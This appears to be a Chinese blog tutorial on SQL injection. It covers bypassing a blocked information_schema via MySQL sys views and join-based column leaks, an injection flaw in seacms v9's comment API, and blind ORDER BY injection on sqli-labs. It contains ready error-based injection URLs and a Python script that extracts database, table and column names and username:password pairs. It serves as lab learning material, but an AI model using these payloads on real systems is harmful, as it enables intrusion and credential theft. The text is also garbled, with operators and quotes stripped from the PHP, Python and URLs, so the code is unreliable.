手机微信网站设计,个人如何做免费网站,孝感网站建设专家,做聚会的网站目录 一、当注入时#xff0c;information_schema被禁用的解决方法
1.通过sys库可以获取到表名和库名
2.通过无列名注入join获取列名
二、seasms v9 注入漏洞
三、order by注入 一、当注入时#xff0c;information_schema被禁用的解决方法 information_schema数据库是My…目录 一、当注入时information_schema被禁用的解决方法
1.通过sys库可以获取到表名和库名
2.通过无列名注入join获取列名
二、seasms v9 注入漏洞
三、order by注入 一、当注入时information_schema被禁用的解决方法 information_schema数据库是MySQL和其他一些数据库系统中存储元数据的标准视图包含表、列、权限等信息。攻击时可以直接查询这些信息来获取数据库结构比如表名和列名。当information_schema被禁用时需要寻找其他途径来获取必要的信息。
1.通过sys库可以获取到表名和库名 在 Mysql 5.7 版本中新增了 sys.schema 基础数据来自于 performance_schema和information_sche两个库中其本身并不存储数据。
可以代替information_schema的表
sys.schema_table_statistics
该表提供了关于表的统计信息包括表所在的数据库table_schema和表名table_name。sys.schema_table_statistics_with_buffer
除了提供基本的表统计信息外还包含了InnoDB缓冲池的统计信息同样有table_schema和table_name字段。sys.schema_auto_increment_columns
如果表中有自增ID列这个视图会包含相关信息可以用来间接推断出表的存在但只限于有自增列的表。
2.通过无列名注入join获取列名 由于join是将两张表的列名给加起来所以有可能会产生相同的列名而在使用别名时是不允出现相同的列名的因此当它们两个一起使用时由于会出现多个相同的列名那么他就会报错。就可以利用此特性进行sql注入查询列名。
select * from (select * from users as a join users b)c; 当查询完第一个列名时使用using排除继续查询下一个列名。
select * from (select * from users as a join users as b using(id)) as c;以此类推可以获取到想要的列名。 二、seasms v9 注入漏洞
漏洞文件
seacmsV9.1/upload/comment/api/index.php
漏洞代码
?php
session_start();
require_once(../../include/common.php);
$id (isset($gid) is_numeric($gid)) ? $gid : 0;
$page (isset($page) is_numeric($page)) ? $page : 1;
$type (isset($type) is_numeric($type)) ? $type : 1;
$pCount 0;
$jsoncachefile sea_DATA./cache/review/$type/$id.js;if($page2)
{if(file_exists($jsoncachefile)){$jsonLoadFile($jsoncachefile);die($json);}
}
$h ReadData($id,$page);
$rlist array();
if($page2)
{createTextFile($h,$jsoncachefile);
}
die($h); function ReadData($id,$page)
{global $type,$pCount,$rlist;$ret array(,,$page,0,10,$type,$id);if($id0){$ret[0] Readmlist($id,$page,$ret[4]);$ret[3] $pCount;$x implode(,,$rlist);if(!empty($x)){$ret[1] Readrlist($x,1,10000);}} $readData FormatJson($ret);return $readData;
}function Readmlist($id,$page,$size)
{global $dsql,$type,$pCount,$rlist;$mlarray();if($id0){$sqlCount SELECT count(*) as dd FROM sea_comment WHERE m_type$type AND v_id$id ORDER BY id DESC;$rs $dsql -GetOne($sqlCount);$pCount ceil($rs[dd]/$size);$sql SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type$type AND v_id$id ORDER BY id DESC limit .($page-1)*$size.,$size ;$dsql-setQuery($sql);$dsql-Execute(commentmlist);while($row$dsql-GetArray(commentmlist)){$row[reply].ReadReplyID($id,$row[reply],$rlist);$ml[]{\cmid\:.$row[id].,\uid\:.$row[uid].,\tmp\:\\,\nick\:\.$row[username].\,\face\:\\,\star\:\\,\anony\:.(empty($row[username])?1:0).,\from\:\.$row[username].\,\time\:\.date(Y/n/j H:i:s,$row[dtime]).\,\reply\:\.$row[reply].\,\content\:\.$row[msg].\,\agree\:.$row[agree].,\aginst\:.$row[anti].,\pic\:\.$row[pic].\,\vote\:\.$row[vote].\,\allow\:\.(empty($row[anti])?0:1).\,\check\:\.$row[ischeck].\};}}$readmlistjoin($ml,,);return $readmlist;
}function Readrlist($ids,$page,$size)
{global $dsql,$type;$rlarray();$sql SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type$type AND id in ($ids) ORDER BY id DESC;$dsql-setQuery($sql);$dsql-Execute(commentrlist);while($row$dsql-GetArray(commentrlist)){$rl[]\.$row[id].\:{\uid\:.$row[uid].,\tmp\:\\,\nick\:\.$row[username].\,\face\:\\,\star\:\\,\anony\:.(empty($row[username])?1:0).,\from\:\.$row[username].\,\time\:\.$row[dtime].\,\reply\:\.$row[reply].\,\content\:\.$row[msg].\,\agree\:.$row[agree].,\aginst\:.$row[anti].,\pic\:\.$row[pic].\,\vote\:\.$row[vote].\,\allow\:\.(empty($row[anti])?0:1).\,\check\:\.$row[ischeck].\};}$readrlistjoin($rl,,);return $readrlist;
}function ReadReplyID($gid,$cmid,$rlist)
{global $dsql;if($cmid0){if(!in_array($cmid,$rlist))$rlist[]$cmid;$row $dsql-GetOne(SELECT reply FROM sea_comment WHERE id$cmid limit 0,1);if(is_array($row)){$ReplyID ,.$row[reply].ReadReplyID($gid,$row[reply],$rlist);}else{$ReplyID ;}}else{$ReplyID ;}return $ReplyID;
}function FormatJson($json)
{$x {\mlist\:[%0%],\rlist\:{%1%},\page\:{\page\:%2%,\count\:%3%,\size\:%4%,\type\:%5%,\id\:%6%}};for($i6;$i0;$i--){$xstr_replace(%.$i.%,$json[$i],$x);}$formatJson jsonescape($x);return $formatJson;
}function jsonescape($txt)
{$jsonescapestr_replace(chr(13),,str_replace(chr(10),,json_decode(str_replace(%u,\u,json_encode(.$txt)))));return $jsonescape;
} 在代码中$ids是通过$rlist数组收集的而$rlist是在Readmlist和ReadReplyID函数中被填充的。在代码中当处理评论回复时会递归地收集相关的回复ID存入$rlist数组中然后生成$ids作为逗号分隔的字符串。在Readrlist函数中$ids被直接拼接到SQL查询的IN子句中而没有任何转义或参数化处理。因此我们可以通过报错注入和单引号绕过的方法实现注入。
通过报错注入出当前用户
http://127.0.0.1/seacmsV9.1/upload/comment/api/index.php?gid1page2rlist[]%27,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),%27 当前数据库
http://127.0.0.1/seacmsV9.1/upload/comment/api/index.php?gid1page2rlist[]%27,%20extractvalue(1,%20concat_ws(0x20,0x5c,(select%20database()))),%27 注入获取表
http://127.0.0.1/seacmsV9.1/upload/comment/api/index.php?gid1page2rlist[]%27,%20extractvalue(1,concat_ws(0x5c,0x5c,(select%20table_name%20from%23%0ainformation_schema.tables%20where%20table_schema%200x736561636d73%20limit%200,1))),%27
【这里获取表时不会报错出东西】 三、order by注入 sort前面是order by通过sort传入的字段排序可以通过用sortif(表达式,列1,列2)的方式注入 可以通过BeautifulSoup爬取表格中username下一格的值来判断表达式的真假并通过二分查找加快注入速度
import requests
from lxml import htmldef get_id_one(URl, paload):res requests.get(urlURl, paramspaload)tree html.fromstring(res.content)id_one tree.xpath(//table//tr[1]/td[1]/text())[0].strip()return id_onedef get_database(URl):s for i in range(1, 10):low 32hight 128mid (low hight) // 2while (hight low):paload { sort: fif((greatest(ascii(substr(database(),{i},1)),{mid}){mid}),id,username) -- }id_one get_id_one(URl, paload)if id_one 1:hight midmid (low hight) // 2else:low mid 1mid (low hight) // 2s chr(mid)print(数据库名: s)def get_table(URl):s for i in range(1, 32):low 32hight 128mid (low hight) // 2while (hight low):paload {sort: fif((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema\security\),{i},1)){mid}),id,username) -- }id_one get_id_one(URl, paload)if id_one 1:low mid 1mid (low hight) // 2else:hight midmid (low hight) // 2s chr(mid)print(表: s)def get_column(URl):s for i in range(1, 32):low 32hight 128mid (low hight) // 2while (hight low):paload {sort: fif((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema\security\ and table_name\users\),{i},1)){mid}),id,username) -- }id_one get_id_one(URl, paload)if id_one 1:low mid 1mid (low hight) // 2else:hight midmid (low hight) // 2s chr(mid)print(列: s)def get_result(URl):s for i in range(1, 32):low 32hight 128mid (low hight) // 2while (hight low):paload {sort: fif((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1)){mid}),id,username) -- }id_one get_id_one(URl, paload)if id_one 1:low mid 1mid (low hight) // 2else:hight midmid (low hight) // 2s chr(mid)print(用户名和密码信息: s)if __name__ __main__:URl http://127.0.0.1/sqlilabs/less-46/index.phpget_database(URl)get_table(URl)get_column(URl)get_result(URl)
